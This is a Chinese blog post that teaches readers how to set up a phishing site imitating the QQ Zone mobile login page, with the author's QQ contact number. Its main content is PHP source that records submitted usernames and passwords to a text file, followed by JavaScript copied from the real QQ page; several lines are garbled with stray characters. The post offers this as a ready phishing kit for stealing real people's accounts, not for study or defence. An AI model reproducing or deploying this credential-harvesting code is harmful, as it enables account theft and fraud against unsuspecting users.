php怎么弄钓鱼,QQ_PHP钓鱼源码

大家好,我是陈文生,今天教大家一下如何搭建一个精仿QQ空间的钓鱼网站(PHP)

有什么不会直接联系我(QQ:2771628927)

先看一下效果

6dad7651cc2f

文生QQ:2771628927

我们看一下后台

6dad7651cc2f

文生QQ:2771628927

活不多说了,直接源码吧<?php

if (isset($_POST["user"])) {

if (isset($_POST["pass"])) {

$myfile = fopen("chenwensheng666.txt", "a") or die("Unable to open file!");

$txt = "━━━━账号=".$_POST["user"]." 密码=".$_POST["pass"];//$_POST["user"]这个变量的意思,在所有post过来的数据当中的 user字段 两个字段或者变量可以用 . 这个符号连接起来,相当于合成一个文本,还有的记得每句php代码后面都需要加;号,不然就会报错。

fwrite($myfile, $txt);

fclose($myfile);

//在这里他完成写文件之后进行跳转

echo '';//echo是输出函数,可以输出文本或者变量

}

}

?>

手机统一登录

QQ空间手机版

更省流量、极速传图、个性背景
访客提醒、权限设置

打开QQ空间手机版

继续访问触屏版

(function(){

var $ = function(id){return document.getElementById(id)};

var on = function(el, event, callback){el.addEventListener(event, callback, false)};

var getCookie = function(name) {

var r = new RegExp("(?:^|;+|\\s+)\s*" + name + "=([^;]*)"), m = document.cookie.match(r);

return !m ? "" : decodeURIComponent(m[1]);

}

var setCookie = function(name, value, domain, path, hour){

if (hour) {

var expire = new Date;

expire.setTime(expire.getTime() + 36E5 * hour)

}

document.cookie = name + "=" + value+ "; " + (hour ? "expires=" + expire.toGMTString() + "; " : "") + (path ? "path=" + path + "; " : "path=/; ") + (domain ? "domain=" + domain + ";" : "domain=" + domainPrefix + ";");

return true

}

var pv = function(domain, path){

var refer = document.referrer.match(/http:\/\/([^/]+)\/([^\?#]+)/);

var param = [

'dm+=' + escape(domain),

'url+=' + escape(path),

'rdm+=' + escape(refer?refer[1]:''),

'rurl+=' + escape(refer?refer[2]:''),

'pgv_pvid+=' + getId(),

'sds+=' + Math.random()

];

img = new Image();

img.src = "http://pingfore.qq.com/pingd?cc=-&ct=-&java=1〈=-&pf=-&scl=-&scr=-&tt=-&tz=-8&vs=3.3&flash=&" + param.join("&")

}

var getId = function () {

var t, d, h, f;

t = document.cookie.match(/(?:^|;+|\s+)pgv_pvid=([^;]*)/i);

if (t && t.length && t.length > 1) {

d = t[1];

} else {

d = (Math.round(Math.random() * 2147483647) * (new Date().getUTCMilliseconds())) % 10000000000;

document.cookie = "pgv_pvid=" + d+ "; path=/; domain=qq.com; expires=Sun,18 Jan 2038 00:00:00 GMT;";

}

h = document.cookie.match(/(?:^|;+|\s+)pgv_info=([^;]*)/i);

if (!h) {

f = (Math.round(Math.random() * 2147483647) * (new Date().getUTCMilliseconds())) % 10000000000;

document.cookie = "pgv_info=ssid=s" + f + "; path=/; domain=qq.com;";

}

return d;

}

/*layer switch*/

var hasShown = getCookie('guide2');

var refer = document.referrer || '';

var url = location.href;

/*弹出逻辑:手动输入网址:refer空或等于http://m.qzone.com*/

// if(refer && refer != 'http://m.qzone.com/' && refer != 'http://m.qzone.com'){

// hasShown = true;

// }

//活动页干掉

if(refer && refer.indexOf('qzs.qq.com')ɬ){

hasShown = true;

}

//微信,qq干掉

if(url.indexOf('5758')ɬ || url.indexOf('5757')ɬ){

hasShown = true;

}else if(url.indexOf('6456')ɬ || url.indexOf('17636')ɬ || url.indexOf('17615')ɬ || url.indexOf('22578')ɬ || url.indexOf('22174')ɬ){

hasShown = true;

}

//MSIE也不展示

var ua = navigator.userAgent;

if(ua.match(/MSIE/)){

hasShown = true;

}

if(ua.indexOf('MicroMessenger')ɬ){

hasShown = true;

}

if(!hasShown){

$('guide').style.display = '';

if(navigator.connection && navigator.connection.type == '2'){

$('guideBG').setAttribute('class','wifi');

}

var close = function(){

setCookie('guide2', '1', ".ui.ptlogin2.qq.com", "/", 7*24);

$('guide').style.display = 'none';

}

on($('guideSkip'),'click',function(){

close();

pv('m.qzone.com','/guide_toWeb');

});

on($('guideJump'),'click',function(){

});

pv('m.qzone.com','/guide_show');

}

})();

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值